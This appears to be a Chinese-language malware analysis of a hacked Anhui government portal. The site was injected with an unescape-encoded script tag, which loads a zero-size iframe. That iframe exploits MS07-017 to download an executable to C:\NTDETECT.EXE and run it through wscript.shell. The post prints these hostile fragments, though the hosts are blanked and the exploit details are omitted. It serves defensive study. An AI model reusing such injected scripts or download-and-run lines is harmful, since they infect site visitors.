|
在探索Google搜索结果过滤网页恶意病毒过程中,发现安徽某政府网亦被恶意入侵者攻陷并插入恶意病毒下载指令。 点击访问“数字安徽”主页(http://www./)后,终截者随即弹出拦截到的网站恶意木马,如下图所示: 查看主页源文件代码,仔细检查后发现可疑挂马指令:
http://bbs./attachments/20070517_299594e27cc651e20407kfRnsUq19DiK.jpg 这段挂马指令经过了 unescape码加密,因此我们还需要还原他本来面目,解密过程通过Unicode码的转换实现即可。 还原如下: Ø %3Cscript%20src%3D%22http%3A///js/1.js%22%3E%3C/script%3E ü <script src=" http:///js/1.js"></script> 下载 http:///js/1.js 查看其源文件,发现该脚本调用了另一个Htm文件,其内容如下:document.write("<iframe width=‘0‘ height=‘0‘ src=‘http:///js/1.htm‘></iframe>");
直接打开这个网页,会被表面现象所蒙蔽,因此这并不是本来面目,如下图所示 这里的源代码解密较周折,我们直接来看结果: 客户端如果没有做好漏洞防护或安装终截者抗病毒软件的话,就有可能直接中招,触发漏洞后,会直接从 http:///js/1.exe 下载病毒体到 C:\NTDETECT.EXE并由 1.vbs解释执行(wscript.createobject("wscript.shell").run "C:\NTDETECT.EXE",0)
1. 漏洞说明:
Microsoft XML核心服务 XMLHTTP控件代码执行漏洞 (MS07-017漏洞) 受影响系统:
Microsoft XML Core Services 4.0 - Microsoft Windows XP SP2 - Microsoft Windows Server 2003 SP1 - Microsoft Windows Server 2003 - Microsoft Windows 2000 SP4 描述:
Microsoft XML核心服务(MSXML)允许使用JScript、VBScript和Microsoft Visual Studio 6.0的用户构建可与其他符合XML 1.0标准的应用程序相互操作的XML应用。 在Microsoft XML Core Services 4.0的XMLHTTP 4.0 ActiveX控件中,setRequestHeader()函数没有正确地处理HTTP请求,允许攻击者诱骗用户访问恶意的站点导致执行任意指令。
2. 漏洞利用
这个漏洞主要是利用两个对象Microsoft.XMLHTTP和Adodb.Stream。
具体过程不做还原演示,此处略。
|
|
|
